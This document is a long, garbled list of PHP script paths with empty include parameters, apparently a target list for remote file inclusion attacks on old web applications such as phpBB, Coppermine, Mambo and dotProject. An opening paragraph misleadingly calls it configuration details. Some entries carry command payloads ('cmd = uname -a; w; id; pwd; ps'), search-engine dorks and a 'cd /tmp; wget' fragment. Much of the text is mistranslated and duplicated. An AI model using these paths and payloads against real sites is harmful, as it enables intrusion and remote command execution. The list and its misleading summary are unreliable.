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The document text mentions many directory paths and filenames that seem to indicate it contains configuration details and paths for various websites and web applications.

Common directories and files mentioned include /includes/, /modules/, /themes/, /admin/, filenames like index.php, header.php, config.php, etc. Many application-specific directories are also listed like /coppermine/, /mygallery/, /forums/, etc.

File extensions like .php and directory names like /phpbb/ indicate PHP is likely in use. Frameworks potentially in use based on directories include Coppermine, MyGallery, phpBB, Joomla components, etc.

/ Includes / header.php? SystemPath = / Galeria / displayCategory.php? BasePath = / PATH_Includes = / Nphp / nphpd.php? Nphp_config [LangFile] = / Include / db.php?

GLOBALS [rootdp] = / Ashnews.php? Pathtoashnews = / Ashheadlines.php? Pathtoashnews = / Modules / xgallery / upgrade_album.php? GALLERY_BASEDIR = / Demo / includes / init.php? User_inc = / Jaf / index.php? Show = / Inc / cutepath? = / Pesquisa / admin / Base_path = / Pollvote / pollvote.php pollname? = / Fontes / post.php? Fil_config = / Modules / My_eGallery / public / displayCategory.php? BasePath = / Bb_lib / Libpach = / Incluir / livre_include.php? No_connect = lol & chem_absolu = / Index.php? From_market = Y & PAGEURL = / Modules / mod_mainmenu.php? MosConfig_absolute_path = / Piv / modules / module_db.php? Pivot_path = / Modules/4nAlbum/public/displayCategory.php? BasePath = / Derniers_commentaires.php? Rep = / Modules / Coppermine / themes / default / theme.php? THEME_DIR = / Modules / coppermine / include / CPG_M_DIR = / Modules / Coppermine / themes / coppercop / theme.php? THEME_DIR = / Coppermine / temas labirinto / / theme.php THEME_DIR? = / Allmylinks / incluir / _AMLconfig [Cfg_serverpath] = / Allmylinks / incluir / _AMVconfig [Cfg_serverpath] = / MyPHPCalendar / admin.php? Cal_dir = / Agendax / Agendax_path = / Modules / mod_mainmenu.php? MosConfig_absolute_path = / Modules / xoopsgallery / upgrade_album.php? GALLERY_BASEDIR = / Pgina? Main.php = / Default.php pgina? = / Index.php ao? = / Index1.php? P = / Index2.php? X = / Index2.php contedo? = / Index.php? Conteudo = / Index.php gato? = / Include / lvc_include_dir? = / Modules / agendax / Agendax_path = / Shoutbox / expanded.php? Conf = / Modules / xgallery / upgrade_album.php? GALLERY_BASEDIR = / Piv / modules / module_db.php? Pivot_path = / Biblioteca editor / / editor.php raiz? = / Biblioteca / lib.php raiz? = / P = e107/e107_handlers/secure_img_render.php? / Zentrack / index.php configFile? = / Main.php? X = / Becommunity comunidade / / index.php? PAGEURL = / GradeMap / index.php pgina? = ? / Phpopenchat / contrib / yabbse / poc.php sourcedir = / .xpl / asc & cmd = un ame-a, w; id; pwd; ps ( => intitle: PHPOpenChat exthp) ? / Calendar / calendar.php ServerPath = / .xpl / asc & cmd = uname-a;? W; id; p wd; ps / Calendar / funes / popup.php ServerPath = / .xpl / asc & cmd = uname-a;? W; id; pwd; ps / Calendar / eventos / ServerPath = / .xpl / asc & cmd = uname-a;

? W; id; pwd; ps ? / Calendar / eventos / datePicker.php ServerPath = / .xpl / asc & cmd = unamea;? W; id; pwd; ps ? / Calendar / setup / setupSQL.php ServerPath = / .xpl / asc & cmd = uname-a;? W; id; pwd; ps ? / Calendar / setup / ServerPath = / .xpl / asc & cmd = uname-a; ? W; id; pwd; ps ( => intitle: "EasyPHPCalendar" exthp) / Mwchat / libs / start_lobby.php? Config [MWCHAT_Libs] = / Zentrack / index.php configFile? = / Piv / modules / module_db.php? Pivot_path = / Inc / header.php / step_one.php? Server_inc = / Install / index.php? Lng =.. /.. / Include / & G_PATH = / Inc / pipe.php? HCL_path = / Incluir / write.php? Dir = / Include / lvc_include_dir? = / Includes / header.php? SystemPath = / Support mailling / / maillist / inc / initdb.php? Absolute_path = / Coppercop / theme.php THEME_DIR? = / Zentrack / index.php configFile? = / Piv / modules / module_db.php? Pivot_path = / Inc / header.php / step_one.php? Server_inc = / Install / index.php? Lng =.. /.. / Include / & G_PATH = / Inc / pipe.php? HCL_path = / Incluir / write.php? Dir = / Include / lvc_include_dir? = / Includes / header.php? SystemPath = / Support mailling / / maillist / inc / initdb.php? Absolute_path = / Coppercop / theme.php THEME_DIR? = / Becommunity comunidade / / index.php? PAGEURL = / Shoutbox / expanded.php? Conf = / Agendax / Agendax_path = / MyPHPCalendar / admin.php? Cal_dir = / Yabbse / Fontes / Packages.php? Sourcedir = / Zboard / zboard.php / Path_of_cpcommerce / _functions.php prefixo? / Dotproject / modules / projects / addedit.php? Root_dir = / Dotproject / modules / projects / view.php? Root_dir = / Dotproject / modules / projects / vw_files.php? Root_dir = / Dotproject / modules / tasks / addedit.php? Root_dir = / Dotproject / modules / tasks / viewgantt.php? Root_dir = / My_eGallery / public / displayCategory.php? BasePath = / Modules / My_eGallery / public / displayCategory.php? BasePath = / Modules/4nAlbum/public/displayCategory.php? BasePath = / Modules / Coppermine / themes / default / theme.php? THEME_DIR = / Modules / agendax / Agendax_path = / Modules / xoopsgallery / upgrade_album.php? GALLERY_BASEDIR = / Modules / xgallery / upgrade_album.php? GALLERY_BASEDIR = / Modules / coppermine / include / CPG_M_DIR = / Modules / mod_mainmenu.php? MosConfig_absolute_path = / Shoutbox / expanded.php? Conf = / Piv / modules / module_db.php? Pivot_path = / Biblioteca editor / / editor.php raiz? = / Biblioteca / lib.php raiz? = / P = e107/e107_handlers/secure_img_render.php? / Main.php? X = / Pgina? Main.php = / Default.php pgina? = / Index.php? Meio.php = / Index.php incluem = |? Index.php / inc = | index.php / page = |? / Index.php p

ag = |? Index.php / p = / Index.php x = |? Index.php / open = |? Index.php / open = | / index.php visual izar = |? Pagina index.php / =? / Index.php content = |? / Index.php cont = |? / Index.php c = |? / Index.php Me io = |? / Index.php x = / Index.php cat = |? Index.php / site = index.php / configFile = |? Index.php / action = |? Index.php / fazer = / Index2.php x = |? Contedo index2.php / = |? Template.php / pagina = |? / Inc / step_one_tables.php server_inc = / GradeMap / index.php page = |? PhpShop / / index.php base_dir = |? / Admin.php cal_dir = / Path_of_cpcommerce / _functions.php prefix = |? Contacts.php / cal_dir = |? / Convert date.php-cal_dir = / Album_portal.php? Phpbb_root_path = / Mainfile.php? MAIN_PATH = / Dotproject / modules / files / index_table.php? Root_dir = / Html / affich.php base? = Galeria / / init.php? HTTP_POST_VARS = / Pm / Pm_path = / Ideabox / include.php? GorumDir = index2.php? includes_dir = fruns / toplist.php? phpbb_root_path = forum / toplist.php? phpbb_root_path = admin / config_settings.tpl.php? include_path = incluem common.php /? include_path = evento / index.php pgina? = forum / index.php? includeFooter = fruns / index.php? includeFooter = forum / bb_admin.php? includeFooter = fruns / bb_admin.php? includeFooter = linguagem / LANG_PORTUGUESE / lang_activity.php? phpbb_root_path = forum / linguagem / LANG_PORTUGUESE / lang_activity.php? phpbb_root_path = blend_data / blend_common.php? phpbb_root_path = master.php? root_path = includes / kb_constants.php? module_root_path = forum / includes / kb_constants.php? module_root_path = fruns / includes / kb_constants.php? module_root_path = classes / adodbt / sql.php? classes_dir = agenda.php3? rootagenda = agenda2.php3? rootagenda = fontes / lostpw.php? CONFIG [caminho] = topsites / fontes / lostpw.php? CONFIG [caminho] = toplist / sources / lostpw.php? CONFIG [caminho] = fontes / join.php? CONFIG [caminho] = topsites / fontes / join.php? CONFIG [caminho] = toplist / fontes / join.php? CONFIG [caminho] = topsite / fontes / join.php? CONFIG [caminho] = public_includes pub_popup / / popup_finduser.php? vsDragonRootPath = extras / pesquisa / poll.php? file_newsportal = index.php? site_path = mail / index.php? site_path = FClique / show.php caminho? = show.php caminho? = Calogic reconfig.php /? GLOBALS [CLPath] = eshow.php? Config_rootdir = leilo / auction_common.php? phpbb_root_path = index.php? inc_dir = calendar / index.php? inc_dir = modules / TotalCalendar / index.php? inc_dir = modules / calendar / index.php? inc_dir =

calendar / embed / day.php caminho? = ACalendar / caminho embed / day.php? = calendar / add_event.php? inc_dir = Claroline / auth / extauth / drivers / clarolineRepositorySys = Claroline / auth / ldap / authldap.php? IncludePath = Docebo / modules / crditos / help.php? lang = mdulos / crditos / help.php? lang = config.php? returnpath = editsite.php? returnpath = in.php? returnpath = addsite.php? returnpath = includes / pafiledb_constants.php? module_root_path = phpBB / includes / pafiledb_constants.php? module_root_path = pafiledb / includes / pafiledb_constants.php? module_root_path = auth / auth.php? phpbb_root_path = auth / auth_phpbb / phpbb_root_path = apc-aa/cron.php3? GLOBALS [AA_INC_PATH] = apc-aa/cached.php3? GLOBALS [AA_INC_PATH] = infuses / last_seen_users_panel / last_seen_users_panel.php? configuraes [local] = phpdig / includes / config.php? relative_s?ri?t_path = inclui phpdig / / includes / config.php? relative_s?ri?t_path = includes / dbal.php? eqdkp_root_path = eqdkp / includes / dbal.php? eqdkp_root_path = dkp / includes / dbal.php? eqdkp_root_path = libpath path/include/SQuery/gameSpy2.php? = include / global.php? GLOBALS [includeBit] = topsites / config.php? returnpath = gerente / frontinc / prepend.php? _PX_config [manager_path] = ubbthreads / addpost_newpoll.php? addpoll = thispath = forum / addpost_newpoll.php? thispath = fruns / addpost_newpoll.php? thispath = ubbthreads / thispath = fruns / thispath = forum / thispath = forum / admin / addentry.php? phpbb_root_path = admin / addentry.php? phpbb_root_path = index.php? f = index.php? agir = ipchat.php? root_path = includes / glob [RootDir] = stats.php? dir [funo] = dir [base] = escada / stats.php? dir [base] = escadas / stats.php? dir [de base] = sphider / admin / configset.php? settings_dir = admin / configset.php? settings_dir = vwar / admin / admin.php? vwar_root = modules / vwar / admin / admin.php? vwar_root = modules / vWar_Account / includes / get_header.php? vwar_root = modules / vWar_Account / includes / functions_common.php? vwar_root2 = sphider / admin / configset.php? settings_dir = admin / configset.php? settings_dir = impex / ImpExData.php? SystemPath = forum / impex / ImpExData.php? SystemPath = fruns / impex / ImpExData.php? SystemPath = application.php? base_path = index.php? theme_path = become_editor.php? theme_path = add.php? theme_path = bad_link.php? theme_path = browse.php? theme_path =

detail.php? theme_path = fav.php? theme_path = get_rated.php? theme_path = login.php? theme_path = mailing_list.php? theme_path = new.php? theme_path = modify.php? theme_path = pick.php? theme_path = power_search.php? theme_path = rating.php? theme_path = register.php? theme_path = review.php? theme_path = rss.php? theme_path = search.php? theme_path = send_pwd.php? theme_path = sendmail.php? theme_path = tell_friend.php? theme_path = top_rated.php? theme_path = user_detail.php? theme_path = user_search.php? theme_path = invoice.php? base_path = cgi-bin / / classes / adodbt / sql.php? classes_dir = cgi-bin/install/index.php? G_PATH = cgi-bin/include/print_category.php? dir = includes / class_template.php? quezza_root_path = Bazar / classified_right.php? language_dir = language_dir classified_right.php? = phpBazar / classified_right.php language_dir? = chat/messagesL.php3? cmd = phpMyChat/chat/messagesL.php3? cmd = bbs / incluir / write.php? dir = visitorupload.php? cmd = mdulos centro / / admin / accounts / process.php? module_path] = modelo index.php? = armygame.php? libpath = lire.php? esfregar = pathofhostadmin / pgina? = apa_module_basedir = index.php? req_path = research/boards/encapsbb-0.3.2_fixed/index_header.php raiz? = Farsi1/index.php? Archive = index.php? archive = modelo show_archives.php? = Frum / include common.php /? pun_root = pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php? GLOBALS [FarmD] = vuln.php? = cgi-bin / / incluir / write.php? dir = admin / BasePath = pm / sfx = pm / pm_path = artmedic-kleinanzeigen-path/index.php? id = pagina index.php? = osTicket / include / main.php? include_dir = include / main.php? config [search_disp] include_dir = = phpCOIN / config.php? _CCFG [_PKG_PATH_DBSE] = quick_reply.php? phpbb_root_path = Zboard / incluir / write.php? dir = PATH / admin / plog-admin-functions.php? Configbasedir = path_to_phpgreetz / content.php contedo? = path_to_qnews / q-news.php? id =

_conf core / / common-tpl-variaveis.php? confdir = votebox.php? VoteBoxPath = al_initialize.php? alpath = incluem db.php /? GLOBALS [rootdp] = mdulos de notcias / / archivednews.php? GLOBALS [language_home] = protection.php? SITEURL = mdulos / AllMyGuests / signin.php? _AMGconfig [cfg_serverpath] = index2.php? includes_dir = classes.php? local_path = extenses / moblog / moblog_lib.php? basedir = modules / newbb_plus / aula / forumpollrenderer.php? bbPath [caminho] = phpWebLog / include / G_PATH = Server? admin/ = trg_news30/trgnews/install/article.php? dir = block.php? Incluir = arpuivo.php? dados = path_to_gallery setup / / index.php GALLERY_BASEDIR? = incluem help.php / base? = index.php? [Home] = path_to_s?ri?t / block.php? Incluir = exemplos / phonebook.php pgina? = PHPNews / auth.php caminho? = incluem print_category.php /? dir = pele zero_vote / / login.php? dir = pele / zero_vote / setup.php? dir = pele / zero_vote / ask_password.php? dir = gui / include / sql.php? include_path = webmail / lib /? emailreader_ini = email.php? login = cer_skin = PhotoGal / ops / gals.php? News_file = personalizado index.php? = cutepath loginout.php? = oneadmin / config.php caminho? [docroot] = xcomic / initialize.php xcomicRootPath? = pele / zero_vote / setup.php? dir = pele zero_vote / / error.php? dir = admin_modules / config [path_src_include] = admin_modules / config [path_src_include] = admin_modules / config [path_src_include] = admin_modules / config [path_src_include] = admin_modules / config [path_src_include] = admin_modules / config [path_src_include] = src / config [path_src_include] = src / config [path_src_include] = src / config [path_src_include] = src / imagem-gd.class.php? config [path_src_include] = src / image.class.php? config [path_src_include] = src / album.class.php? config [path_src_include] = src / config [path_src_include] = src / config [path_src_include] = src / config [path_admin_include] = yappa-ng/src/ config [path_src_include] = admin_modules / config [path_src_include] = admin_modules / config [path_src_include] = admin_modules / config [path_src_include] = admin_modules / config [path_src_include] = admin_modules / config [path_src_include] = admin_modules / config [path_src_include] = src / config [path_src_include] = src / imagem-gd.class.php? config [path_src_include] =

src / image.class.php? config [image_module] = src / album.class.php? config [path_src_include] = src / config [path_src_include] = src / config [path_src_include] = includes / db_adodb.php? basedir = includes / db_connect.php? basedir = includes / session.php? basedir = mdulos / projetos / gantt.php? dPconfig [root_dir] = modules/projects/gantt2.php? dPconfig [root_dir] = mdulos / projetos / vw_files.php? dPconfig [root_dir] = modules / admin / vw_usr_roles.php? basedir = mdulos / public / calendar.php? basedir = mdulos / public / date_format.php? basedir = mdulos / tarefas / gantt.php? basedir = mantis / login_page.php g_meta_include_file? = PhpGedView / help_text_vars.php PGV_BASE_DIRECTORY? = modules / My_eGallery / public / displayCategory.php? BasePath = dotproject / modules / files / index_table.php? root_dir = nukebrowser.php? filnavn = bug_sponsorship_list_view_inc.php? t_core_path = modules / coppermine / themes / coppercop / theme.php? THEME_DIR = modules / coppermine / temas labirinto / / theme.php THEME_DIR? = modules / coppermine / include / CPG_M_DIR = includes / calendar.php? phpc_root_path = includes / setup.php? phpc_root_path = phpBB modo / admin / admin_styles.php? = amember / plugins / db / mysql / config = admin / lang.php? CMS_ADMIN_PAGE = inc / pipe.php? HCL_path = incluem write.php /? dir = becommunity comunidade / / index.php? PAGEURL = modules / xoopsgallery / upgrade_album.php? GALLERY_BASEDIR = modules / mod_mainmenu.php? mosConfig_absolute_path = Os mdulos / agendax / agendax_path = shoutbox / expanded.php? conf = modules / xgallery / upgrade_album.php? GALLERY_BASEDIR = Pgina index.php? = index.php? pag = index.php? incluem = contedo index.php? = index.php? cont = index.php? c = modules / My_eGallery / index.php? BasePath = modules / newbb_plus / classe / forumpollrenderer.php? bbPath = journal.php? m = index.php? m = links.php? c = forums.php? m = list.php? c = user.php? xoops_redirect = index.php? id = url r.php? = CubeCart / includes / & Glob [RootDir] = inc / s?ri?t_root = include / G_PATH = backend / PATH addons / links / index.php? = modules / newbb_plus / aula / class.forumposts.php? bbPath [caminho] = modules / newbb_plus / aula / forumpollrenderer.php? bbPath [caminho] = protection.php? SITEURL = htmltonuke.php? filnavn =

mail_autocheck.php? pm_path = index.php? p = modules/4nAlbum/public/displayCategory.php? BasePath = e107/e107_handlers/secure_img_render.php? p = include / lvc_include_dir? = path_of_cpcommerce _functions.php / prefixo? = comunidade / modules / agendax / agendax_path = biblioteca editor / / editor.php raiz? = biblioteca / lib.php raiz? = zentrack / index.php? configFile = piv / modules / module_db.php? pivot_path = main.php? x = myPHPCalendar / admin.php? cal_dir = index.php / main.php? x = index.php? x = index.php? abrir = index.php? visualizar = pagina template.php? = index.php? inc = includes / include_onde.php? include_file = index.php? pg = index.php? show = gato index.php? = print.php? val1 = cmd.php funo? = arquivo iframe.php? = os / pointer.php? url = p_uppc_francais / pages_php / p_aidcon_conseils / index.php? FM = index.php? = db.php? path_local = PhpGedView / individual.php PGV_BASE_DIRECTORY? = index.php? kietu [url_hit] = phorum / plugin / substituir / plugin.php? phorum [settings_dir] = Fontes / Packages.php? Sourcedir = yabbse / Fontes / Packages.php? sourcedir = modules/PNphpBB2/includes/functions_admin.php? phpbb_root_path = cgi-bin / / gadgets / Blog / BlogModel.php? path = cgi-bin / / admin.php? cal_dir = galeria / captionator.php? GALLERY_BASEDIR = cgi-bin/main.php? x = Blog / BlogModel.php caminho? = admin.php? cal_dir = expanded.php? conf = mwchat / libs / start_lobby.php? config [MWCHAT_Libs] = pollvote / pollvote.php? pollname = displayCategory.php? BasePath = phpBB2/admin/admin_cash.php? phpbb_root_path = modules / foro / includes / functions_admin.php? phpbb_root_path = mdulos / Fruns / admin / admin_forums.php? phpEx = mdulos / Fruns / admin / admin_disallow.php? phpEx = mdulos / Fruns / admin / admin_smilies.php? phpEx = mdulos / Fruns / admin / admin_board.php? phpEx = mdulos / Fruns / admin / admin_users.php? phpEx = mdulos / Fruns / admin / admin_mass_email.php? phpEx = mdulos / Fruns / admin / admin_forum_prune.php? phpEx = mdulos / Fruns / admin / admin_styles.php? phpbb_root_path = index.php? hc = mt-comments.cgi? id = WebCalendar / ferramentas / send_reminders.php? includedir = coID cmd/product_info.php/products_id/1622/shop_content.php? = agendax_path = step_one.php? server_inc = upgrade_album.php? GALLERY_BASEDIR = cutepath search.php? = nome modules.php? = wagora / extras / / quicklist.php site? = vCard / admin / match = forum / ubbthreads.php gato? = admin / includes / classes / Spaw / spaw_control.class.php? spaw_root = secure.php? cfgProgDir = modules / My_eGallery / public / / inc /? HCL_path = modules / My_eGallery / public / imagen.php? BasePath = adlayer.php? layerstyle = Frum / bb_smilies.php nome? = mdulos / Fruns / bb_smilies.php? name = gadgets / caminho Blog / BlogModel.php? = learnlinc / clmcpreload.php? CLPATH = ModernBill / samples / news.php? DIR = religies / faq.php? page = forum / viewtopic.php? t = announcements.php? IncludePath = INC / header.php / step_one.php? server_inc = phpatm / index.php include_location? = gb/ lang = shannen / index.php? x = famlia PhpGedView / / index.php PGV_BASE_DIRECTORY? = main.php? esquerda = forum / misc.php ao? = ncleo / libs / globalfunctions.php? DIR_LIBS = cutepath show_archives.php? = gallery.php = magicforum / misc.php ao? = forum / admin / aes / del.php? include_path = index.php? Meio = local/investing_industrialeastate1.php? a = modules / coppermine / themes / default / theme.php? THEME_DIR Popper / index.php? Forma = class.mysql.php? path_to_bt_dir = include / _AMLconfig [cfg_serverpath] = eyeos / desktop.php? Baccio = ashnews.php? pathtoashnews = MODPATH index.php? = becommunity comunidade / / index.php? PAGEURL = index.php? sqld = modules / module_db.php? pivot_path = loja / includes / include_once.php? include_file = cgi-bin/ fromTemplate = vivo / inc / pipe.php? HCL_path = zb41/include/write.php? dir = cgi-bin/ logfile? = presse/stampa.php3? azione = inc / step_one_tables.php server_inc? = mainpage index.php? = phpprojekt / lib /? path_pre = captionator.php? GALLERY_BASEDIR = _head.php? _zb_path =. Achievo / atk j?v?s?ript / / class.atkdateattribute.js.php? config_atkroot = galeria / captionator.php? GALLERY_BASEDIR =. globals.php3? LangCookie =. incluem msql.php /? inc_dir =

include/mssql7.php? inc_dir = incluem mysql.php /? inc_dir = include/oci8.php? inc_dir = incluem postgres.php /? inc_dir = include/postgres65.php? inc_dir = install.php? phpbb_root_dir = mantis / login_page.php? g_meta_inc_dir = modelo page.php? = Phorum / admin / aes / del.php? include_path = app_path = user / agora_user.php? inc_dir = user / ldap_example.php? inc_dir = userlist.php? ME =. prefixo _functions.php? = cpcommerce _functions.php / prefixo? = ? ashnews.php pathtoashnews = cd / tmp; wget eblog / xoopsConfig [xoops_url] = b2-tools/gm-2-b2.php? b2inc = includes / include_once.php? include_file = nome modules.php? = jokeid = index.php? = LiveHelp / inc / pipe.php? HCL_path = hcl / inc / pipe.php? HCL_path = support / faq / inc / pipe.php? HCL_path = help / faq / inc / pipe.php? HCL_path = HelpCenter / inc / pipe.php? HCL_path = live-support/inc/pipe.php? HCL_path = gnu3/index.php? doc = gnu / index.php? doc = phpgwapi setup / / appdir = includes / calendar.php? phpc_root_path = includes / setup.php? phpc_root_path = inc / path_pre = incluem /? path_pre = web_statistics / modules / coppermine / themes / default / theme.php THEME_DIR? = web_statistics / / ferramentas / send_reminders.php? includedir = web_statistics / / incluir / write.php? dir = web_statistics / / modules / My_eGallery / public / displayCategory.php? BasePat h = web_statistics / / calendar / ferramentas / send_reminders.php? includedir = web_statistics / / pele zero_vote / / error.php? dir = web_statistics / / coppercop / theme.php? THEME_DIR = includes / header.php? SystemPath = Galeria / displayCategory.php? BasePath = PATH_Includes = nphp / nphpd.php? nphp_config [LangFile] = ashheadlines.php? pathtoashnews = demo / includes / init.php? user_inc = jaf / index.php? show = inc / cutepath? = pesquisa / admin / base_path = fontes / post.php? fil_config = bb_lib / libpach = incluem livre_include.php /? chem_absolu = index.php? PAGEURL = derniers_commentaires.php? rep = modules / coppermine / themes / default / theme.php THEME_DIR? = coppermine / themes / THEME_DIR labirinto / theme.php? = allmylinks / incluir / _AMLconfig [cfg_serverpath] =

allmylinks / incluir / _AMVconfig [cfg_serverpath] = agendax / agendax_path = pgina? main.php = Pgina default.php? = ao index.php? = index1.php? p = index2.php? x = contedo index2.php? = index.php? conteudo = GradeMap / index.php pgina? = phpopenchat / contrib / yabbse / poc.php? sourcedir = calendar / calendar.php? ServerPath = calendrio / funes / popup.php? ServerPath = calendrio / eventos / ServerPath = calendrio / eventos / datePicker.php? ServerPath = calendrio de configurao / / setupSQL.php? ServerPath = calendrio de configurao / / ServerPath = instalar / index.php? G_PATH = apoio mailling / / maillist / inc / initdb.php? absolute_path = coppercop / theme.php THEME_DIR? = dotproject / modules / projects / addedit.php? root_dir = dotproject / modules / projects / view.php? root_dir = dotproject / modules / projects / vw_files.php? root_dir = dotproject / modules / tasks / addedit.php? root_dir = dotproject / modules / tasks / viewgantt.php? root_dir = My_eGallery / public / displayCategory.php? BasePath = index.php? meio.php = configFile index.php? = index.php? do = phpShop / index.php base_dir? = contacts.php? cal_dir = converter-date.php? cal_dir = album_portal.php? phpbb_root_path = mainfile.php? MAIN_PATH = html / affich.php base? = Galeria / init.php? HTTP_POST_VARS = ideabox / include.php? gorumDir = stats / modules / My_eGallery / index.php? BasePath = stats / include write.php /? dir = Estatstica / ferramentas / send_reminders.php? includedir = index.cgiupgrade_album.php? GALLERY_BASEDIR = pollvote / pollvote.php pollname? includes / page_header.php? dir = index2.php? mosConfig_absolute_path = nova / bbs / / incluir / write.php? dir = index.php? mosConfig_absolute_path = modules / My_eGallery / public / inc /? HCL_path = / Forum / auth / auth.php? Phpbb_root_path = / Forum / auth / auth_phpbb / phpbb_root_path = / / CuteNews comments.php cutepath? = / Biblioteca / lib.php raiz? = / Impex / ImpExData.php? SystemPath = / Coppermine / thumbnails.php? Lang = / Galeria / thumbnails.php? Lang = / / AWebNews visview.php? Path_to_news = / Ashnews.php? Pathtoashnews = / 4images/index.php modelo? = / Galeri / index.php modelo? = / Componentes / com_extcalendar / admin_events.php? CONFIG_EXT [LANGUAGES_DIR] = / Componentes / com_loudmounth / includes / ABBC / abbc.class.php? MosConfig_abs

olute_path = / Componentes / com_smf / smf.php? MosConfig_absolute_path = / Componentes / com_videodb / core / videodb.class.xml.php? MosConfig_absolute_p ath = / Componentes / com_simpleboard / image_upload.php? Sbp = / Galeria / index.php modelo? = / Auth / auth.php? Phpbb_root_path = / Auth / auth_phpbb / phpbb_root_path = / Modules / Fruns / admin / index.php? Phpbb_root_path = / Modules / Fruns / admin / admin_avatar.php? Phpbb_root_path = / Modules / Fruns / admin / admin_styles.php? Phpbb_root_path = / _wk / Wk_lang.php? WkPath = / Shoutbox / expanded.php? Conf = / MyPHPCalendar / admin.php? Cal_dir = / Phorum / plugin / substituir / plugin.php? Phorum [settings_dir] = / Modules / forums / admin / admin_board.php? PhpEx = / Modules / Fruns / admin / admin_users.php? PhpEx = / Biblioteca editor / / editor.php raiz? = / Biblioteca / lib.php raiz? = / P = e107/e107_handlers/secure_img_render.php? / Modules / My_eGallery / public / displayCategory.php? BasePath = / Modules / My_eGallery / index.php? BasePath = / Modules / Coppermine / themes / default / theme.php? THEME_DIR = / Modules/4nAlbum/public/displayCategory.php? BasePath = / Modules / Coppermine / themes / coppercop / theme.php? THEME_DIR = / Modules / Coppermine / themes / labirinto / theme.php? THEME_DIR = / Modules / coppermine / include / CPG_M_DIR = / PhpBB / admin / admin_styles.php? Mode = / Modules / xoopsgallery / upgrade_album.php? GALLERY_BASEDIR = / Modules / xgallery / upgrade_album.php? GALLERY_BASEDIR = / Index.php pgina? = / Index.php? Pag = / Index.php? Sayfa = / Index.php? Pg = / Index.php? Incluem = / Index.php contedo? =

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